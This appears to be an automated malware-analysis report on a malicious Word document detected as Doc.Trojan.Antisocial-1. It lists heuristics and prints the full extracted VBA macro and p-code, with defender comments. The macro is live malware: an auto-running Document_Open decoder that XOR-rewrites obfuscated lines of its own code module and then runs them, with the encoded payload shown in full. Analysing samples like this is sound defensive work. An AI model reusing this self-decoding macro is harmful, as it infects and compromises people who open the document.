MALICIOUS
228
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing a VBA macro. The Document_Open macro is designed to deobfuscate and execute code, as indicated by the p-code auto-execution heuristic and the script's structure. This behavior strongly suggests the macro's purpose is to download and execute a second-stage payload, a common technique for malware delivery.
Heuristics 5
-
ClamAV: Doc.Trojan.Antisocial-1 — critical — CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Trojan.Antisocial-1
-
Reference to Windows Script Host — high — SC_STR_WSCRIPT: Reference to Windows Script Host
-
VBA macros detected — medium — 2 related findings — OLE_VBA_MACROS: Document contains VBA macro code
-
VBA p-code auto-exec with execution tokens — high — OLE_VBA_PCODE_AUTOEXEC_EXEC: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where the visible source is unavailable.
-
Document_Open macro — low — OLE_VBA_DOCOPEN: Document_Open macro. Matched line in script:
Attribute VB_Customizable = True Private Sub Document_Open() Application.ScreenUpdating = Int(Rnd * 0)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8721 bytes |

SHA-256: 980399b675f9720ab9dc4fbe7f8124829dd582a48871710a6bc30a2d2c6bbe28

Detection — ClamAV: Doc.Trojan.Antisocial-1

Obfuscation or payload: unlikely
Preview script — first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Module header emitted by the VBA export for the ThisDocument class module.
' The p-code dump further down numbers the Document_Open declaration as
' line #0, i.e. these Attribute lines are not part of the code module that
' the decoder below indexes through CodeModule.Lines.
' Auto-execution entry point (Word's Document_Open event).
' This routine is an in-place decoder, not the payload: it rewrites code-module
' lines 20-61 (the 42 comment lines of VM below) in the live module and only
' then calls VM, so the code that actually runs exists nowhere in the extracted
' source. Every line is decoded with a single-byte XOR whose key is carried by
' that line itself.
' Defender notes: the VBProject / CodeModule access used here needs
' "Trust access to the VBA project object model"; where that is not granted,
' the VBProject reference fails at runtime and VM is never rewritten (the
' decoder depends on the line numbering of the module, so any inserted line,
' including these annotations, also breaks it). Detection should rely on the
' p-code / auto-exec heuristics rather than on the visible source.
Private Sub Document_Open()
' Rnd * 0 is always 0, so this is ScreenUpdating = False behind a trivial literal.
Application.ScreenUpdating = Int(Rnd * 0)
' Suppress prompts and disable the cancel key so the loop is not interrupted.
Application.DisplayAlerts = wdAlertsNone
Application.EnableCancelKey = wdCancelDisabled
' Walk code-module lines 20..61 of the first VBA component (this module).
For V1 = 20 To 61
V2 = Null
V3 = (ThisDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(V1, 1))
' Per-line key: the character right after the leading apostrophe, XOR 39.
V4 = Asc((Mid(V3, 2, 1)))
V5 = V4 Xor 39
' XOR the remainder of the line (position 3 onward) with that key.
For V6 = 3 To Len(V3)
V7 = Asc(Mid(V3, V6, 1)) Xor V5
V2 = V2 & Chr(V7) ' Null & string concatenates as if Null were ""
Next
V8 = V2
' Overwrite the comment line in the live code module with its decoded form.
ThisDocument.VBProject.VBComponents.Item(1).CodeModule.ReplaceLine V1, V8
Next
' Only now does VM contain executable statements.
Call VM
End Sub
' Placeholder body. As extracted, every line of VM is a comment whose second
' character is a per-line XOR key byte; Document_Open rewrites these lines in
' place before calling VM, so the routine is inert in this listing and the
' executing code is present only in the live module after decoding.
' This is why source-based scanning of macros.bas sees little (the static
' verdict above rates obfuscation or payload "unlikely") while the p-code
' auto-exec + execution-token heuristic flags the document; do not treat
' this comment block as the code that runs.
Private Sub VM()
'$Elq#U2#>#13#Wl#52
'$U1#>#Mvoo
'%T1"?" % "$"*VjkqFmawoglv,T@Rpmhgav,T@Amormlglvq,Kvgo*3+,AmfgOmfwng,Nklgq*T3."3++
'"S1%8%Lkq-Wka-,%/%=,%.%4
'%Dmp"T7"?"3"Vm"Ngl*T1+
'"S3%8%Dvf-Hla-S6)%S0)%4,,%]jw%S1
'$U1#>#U1#%#@kq+U5*
'/Fmp|(^=
'#R3$9$R6
'%VjkqFmawoglv,T@Rpmhgav,T@Amormlglvq,Kvgo*3+,AmfgOmfwng,PgrncagNklg"T3." % "$"T5
'!Hc~r&P7
'!Ivroihu(Eih`otkEihpctuoihu&;&Ohr.Thb&,&6/
'"Juqljkv+Vds`KjwhdiUwjhuq%8%Lkq-Wka%/%5,
' Hwsnhit)QnurtWuhsbdsnhi':'Nis/Uic'-'7.
'%OT"?"VjkqFmawoglv,T@Rpmhgav,T@Amormlglvq,Kvgo*3+,AmfgOmfwng,Nklgq*3."VjkqFmawoglv,T@Rpmhgav,T@Amormlglvq,Kvgo*3+,AmfgOmfwng,AmwlvMdNklgq+
' IhujfkSbjwkfsb)QEWuhmbds)QEDhjwhibist)Nsbj/6.)DhcbJhcrkb)CbkbsbKnibt'6+'IhujfkSbjwkfsb)QEWuhmbds)QEDhjwhibist)Nsbj/6.)DhcbJhcrkb)DhrisHaKnibt
'%LmpocnVgorncvg,T@Rpmhgav,T@Amormlglvq,Kvgo*3+,AmfgOmfwng,CffDpmoQvpkle"OT
'/An(Ik|a~mLgk}emf|&ZmilGfdq(5(\z}m(\`mf
'&Rdu@uus!@buhwdEnbtldou/GtmmO`ld-!wcOnsl`m
'&@buhwdEnbtldou/Sdmn`e
' FdsnqbChdrjbis)QEWuhmbds)QEDhjwhibist)Nsbj/6.)DhcbJhcrkb)CbkbsbKnibt'6+'FdsnqbChdrjbis)QEWuhmbds)QEDhjwhibist)Nsbj/6.)DhcbJhcrkb)DhrisHaKnibt
'#Egpmra@kgqiajp*RFTvknagp*RFGkitkjajpw*Mpai,5-*Gk`aIk`qha*E``BvkiWpvmjc$IR
'#Egpmra@kgqiajp*WeraEw$BmhaJeia>9Egpmra@kgqiajp*BqhhJeia
'&Rdu@uus!@buhwdEnbtldou/GtmmO`ld-!wcSd`eNomx
'&@buhwdEnbtldou/Sdmn`e
'%Gnqg
'&@buhwdEnbtldou/WCQsnkdbu/WCBnlqnodour/Hudl)0(/BnedLnetmd/EdmdudMhodr!0-!@buhwdEnbtldou/WCQsnkdbu/WCBnlqnodour/Hudl)0(/BnedLnetmd/BntouNgMhodr
'!GeropcBieskchr(PDVtilcer(PDEikvihchru(Orck.7/(EibcKibsjc(Gbb@tikUrtoha&KP
'"Dfqls`Ajfph`kq+Vds`Dv%Cli`Kdh`?8Dfqls`Ajfph`kq+CpiiKdh`
'"@ka%Lc
'%Q{qvgo,RpktcvgRpmdkngQvpkle* ." JIG[]ANCQQGQ]PMMV^,n{q ." +"?" T@QDkng
'#W}wpai*TvmrepaTvkbmhaWpvmjc,&&($&LOA][HKGEH[IEGLMJAXWkbpsevaXImgvkwkbpXSmj`kswXGqvvajpRavwmkjXVqj&($&&-$9$&G>XImvamhha*h}w&
'!Ivch&$E<ZKotcojjc(j u$&@it&Isrvsr&Gu&%7
' Wunis'$6+'%Tbs'phuchem':'DubfsbHembds/%'!'Dou/43.'!'%Phuc)Fwwkndfsnhi%'!'Dou/43.'!'%.%
'#Tvmjp$'5($&Imvamhha$9$swgvmtp*WgvmtpBqhhJeia&
'/Xzaf|(+9$(*[m|(F\(5( gzlgjb&Fgzeid\mexdi|m&^JXzgbmk|&^JKgexgfmf|{&A|me 9!*
'!Vtohr&%7*&$HR(EibcKibsjc(BcjcrcJohcu&7*&HR(EibcKibsjc(EishrI`Johcu$
'&Qshou!"0-!#OU/BnedLnetmd/@eeGsnlGhmd!Lhsdhmmd#
'!Vtohr&%7*&$HR(EibcKibsjc(BcjcrcJohcu&7*&1$
'!Vtohr&%7*&$qitbidl(Wsor$
'&Qshou!"0-!LW
'#Ghkwa$'5
End Sub
' Processing file: /tmp/qstore_oeck2b3e
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 13977 bytes
' Line #0:
' FuncDefn (Private Sub Document_Open())
' Line #1:
' Ld Rnd
' LitDI2 0x0000
' Mul
' FnInt
' Ld Application
' MemSt ScreenUpdating
' Line #2:
' Ld wdAlertsNone
' Ld Application
' MemSt DisplayAlerts
' Line #3:
' Ld wdCancelDisabled
' Ld Application
' MemSt EnableCancelKey
' Line #4:
' StartForVariable
' Ld V1
' EndForVariable
' LitDI2 0x0014
' LitDI2 0x003D
' For
' Line #5:
' LitVarSpecial (Null)
' St V2
' Line #6:
' Ld V1
' LitDI2 0x0001
' LitDI2 0x0001
' Ld ThisDocument
' MemLd VBProject
' MemLd VBComponents
' ArgsMemLd Item 0x0001
' MemLd CodeModule
' ArgsMemLd Lines 0x0002
' Paren
' St V3
' Line #7:
' Ld V3
' LitDI2 0x0002
' LitDI2 0x0001
' ArgsLd Mid$ 0x0003
' Paren
' ArgsLd Asc 0x0001
' St V4
' Line #8:
' Ld V4
' LitDI2 0x0027
' Xor
' St V5
' Line #9:
' StartForVariable
' Ld V6
' EndForVariable
' LitDI2 0x0003
' Ld V3
' FnLen
' For
' Line #10:
' Ld V3
' Ld V6
' LitDI2 0x0001
' ArgsLd Mid$ 0x0003
' ArgsLd Asc 0x0001
' Ld V5
' Xor
' St V7
' Line #11:
' Ld V2
' Ld V7
' ArgsLd Chr 0x0001
' Concat
' St V2
' Line #12:
' StartForVariable
' Next
' Line #13:
' Ld V2
' St V8
' Line #14:
' Ld V1
' Ld V8
' LitDI2 0x0001
' Ld ThisDocument
' MemLd VBProject
' MemLd VBComponents
' ArgsMemLd Item 0x0001
' MemLd CodeModule
' ArgsMemCall ReplaceLine 0x0002
' Line #15:
' StartForVariable
' Next
' Line #16:
' ArgsCall (Call) VM 0x0000
' Line #17:
' EndSub
' Line #18:
' FuncDefn (Private Sub VM())
' Line #19:
' QuoteRem 0x0000 0x0012 "$Elq#U2#>#13#Wl#52"
' Line #20:
' QuoteRem 0x0000 0x000A "$U1#>#Mvoo"
' Line #21:
' QuoteRem 0x0000 0x0051 "%T1"?" % "$"*VjkqFmawoglv,T@Rpmhgav,T@Amormlglvq,Kvgo*3+,AmfgOmfwng,Nklgq*T3."3++"
' Line #22:
' QuoteRem 0x0000 0x0018 ""S1%8%Lkq-Wka-,%/%=,%.%4"
' Line #23:
' QuoteRem 0x0000 0x0016 "%Dmp"T7"?"3"Vm"Ngl*T1+"
' Line #24:
' QuoteRem 0x0000 0x0020 ""S3%8%Dvf-Hla-S6)%S0)%4,,%]jw%S1"
' Line #25:
' QuoteRem 0x0000 0x0012 "$U1#>#U1#%#@kq+U5*"
' Line #26:
' QuoteRem 0x0000 0x0008 "/Fmp|(^="
' Line #27:
' QuoteRem 0x0000 0x0008 "#R3$9$R6"
' Line #28:
' QuoteRem 0x0000 0x0050 "%VjkqFmawoglv,T@Rpmhgav,T@Amormlglvq,Kvgo*3+,AmfgOmfwng,PgrncagNklg"T3." % "$"T5"
' Line #29:
' QuoteRem 0x0000 0x0008 "!Hc~r&P7"
' Line #30:
' QuoteRem 0x0000 0x002A "!Ivroihu(Eih`otkEihpctuoihu&;&Ohr.Thb&,&6/"
' Line #31:
' QuoteRem 0x0000 0x0028 ""Juqljkv+Vds`KjwhdiUwjhuq%8%Lkq-Wka%/%5,"
' Line #32:
' QuoteRem 0x0000 0x0027 " Hwsnhit)QnurtWuhsbdsnhi':'Nis/Uic'-'7."
' Line #33:
' QuoteRem 0x0000 0x008A "%OT"?"VjkqFmawoglv,T@Rpmhgav,T@Amormlglvq,Kvgo*3+,AmfgOmfwng,Nklgq*3."VjkqFmawoglv,T@Rpmhgav,T@Amormlglvq,Kvgo*3+,AmfgOmfwng,AmwlvMdNklgq+"
' Line #34:
' QuoteRem 0x0000 0x008E " IhujfkSbjwkfsb)QEWuhmbds)QEDhjwhibist)Nsbj/6.)DhcbJhcrkb)CbkbsbKnibt'6+'IhujfkSbjwkfsb)QEWuhmbds)QEDhjwhibist)Nsbj/6.)DhcbJhcrkb)DhrisHaKnibt"
' Line #35:
' QuoteRem 0x0000 0x004A "%LmpocnVgorncvg,T@Rpmhgav,T@Amormlglvq,Kvgo*3+,AmfgOmfwng,CffDpmoQvpkle"OT"
' Line #36:
' QuoteRem 0x0000 0x0027 "/An(Ik|a~mLgk}emf|&ZmilGfdq(5(\z}m(\`mf"
' Line #37:
' QuoteRem 0x0000 0x002A "&Rdu@uus!@buhwdEnbtldou/GtmmO`ld-!wcOnsl`m"
' Line #38:
' QuoteRem 0x0000 0x0016 "&@buhwdEnbtldou/Sdmn`e"
' Line #39:
' QuoteRem 0x0000 0x008E " FdsnqbChdrjbis)QEWuhmbds)QEDhjwhibist)Nsbj/6.)DhcbJhcrkb)CbkbsbKnibt'6+'FdsnqbChdrjbis)QEWuhmbds)QEDhjwhibist)Nsbj/6.)DhcbJhcrkb)DhrisHaKnibt"
' Line #40:
' QuoteRem 0x0000 0x004A "#Egpmra@kgqiajp*RFTvknagp*RFGkitkjajpw*Mpai,5-*Gk`aIk`qha*E``BvkiWpvmjc$IR"
' Line #41:
' QuoteRem 0x0000 0x0038 "#Egpmra@kgqiajp*WeraEw$BmhaJeia>9Egpmra@kgqiajp*BqhhJeia"
' Line #42:
' QuoteRem 0x0000 0x002C "&Rdu@uus!@buhwdEnbtldou/GtmmO`ld-!wcSd`eNomx"
' Line #43:
' QuoteRem 0x0000 0x0016 "&@buhwdEnbtldou/Sdmn`e"
' Line #44:
' QuoteRem 0x0000 0x0005 "%Gnqg"
' Line #45:
' QuoteRem 0x0000 0x008E "&@buhwdEnbtldou/WCQsnkdbu/WCBnlqnodour/Hudl)0(/BnedLnetmd/EdmdudMhodr!0-!@buhwdEnbtldou/WCQsnkdbu/WCBnlqnodour/Hudl)0(/BnedLnetmd/BntouNgMhodr"
' Line #46:
' QuoteRem 0x0000 0x004A "!GeropcBieskchr(PDVtilcer(PDEikvihchru(Orck.7/(EibcKibsjc(Gbb@tikUrtoha&KP"
' Line #47:
' QuoteRem 0x0000 0x0038 ""Dfqls`Ajfph`kq+Vds`Dv%Cli`Kdh`?8Dfqls`Ajfph`kq+CpiiKdh`"
' Line #48:
' QuoteRem 0x0000 0x0007 ""@ka%Lc"
' Line #49:
' QuoteRem 0x0000 0x0049 "%Q{qvgo,RpktcvgRpmdkngQvpkle* ." JIG[]ANCQQGQ]PMMV^,n{q ." +"?" T@QDkng"
' Line #50:
' QuoteRem 0x0000 0x007C "#W}wpai*TvmrepaTvkbmhaWpvmjc,&&($&LOA][HKGEH[IEGLMJAXWkbpsevaXImgvkwkbpXSmj`kswXGqvvajpRavwmkjXVqj&($&&-$9$&G>XImvamhha*h}w&"
' Line #51:
' QuoteRem 0x0000 0x0028 "!Ivch&$E<ZKotcojjc(j u$&@it&Isrvsr&Gu&%7"
' Line #52:
' QuoteRem 0x0000 0x0057 " Wunis'$6+'%Tbs'phuchem':'DubfsbHembds/%'!'Dou/43.'!'%Phuc)Fwwkndfsnhi%'!'Dou/43.'!'%.%"
' Line #53:
' QuoteRem 0x0000 0x002E "#Tvmjp$'5($&Imvamhha$9$swgvmtp*WgvmtpBqhhJeia&"
' Line #54:
' QuoteRem 0x0000 0x004B "/Xzaf|(+9$(*[m|(F\(5( gzlgjb&Fgzeid\mexdi|m&^JXzgbmk|&^JKgexgfmf|{&A|me 9!*"
' Line #55:
' QuoteRem 0x0000 0x0044 "!Vtohr&%7*&$HR(EibcKibsjc(BcjcrcJohcu&7*&HR(EibcKibsjc(EishrI`Johcu$"
' Line #56:
' QuoteRem 0x0000 0x002F "&Qshou!"0-!#OU/BnedLnetmd/@eeGsnlGhmd!Lhsdhmmd#"
' Line #57:
' QuoteRem 0x0000 0x002B "!Vtohr&%7*&$HR(EibcKibsjc(BcjcrcJohcu&7*&1$"
' Line #58:
' QuoteRem 0x0000 0x0019 "!Vtohr&%7*&$qitbidl(Wsor$"
' Line #59:
' QuoteRem 0x0000 0x000D "&Qshou!"0-!LW"
' Line #60:
' QuoteRem 0x0000 0x0009 "#Ghkwa$'5"
' Line #61:
' EndSub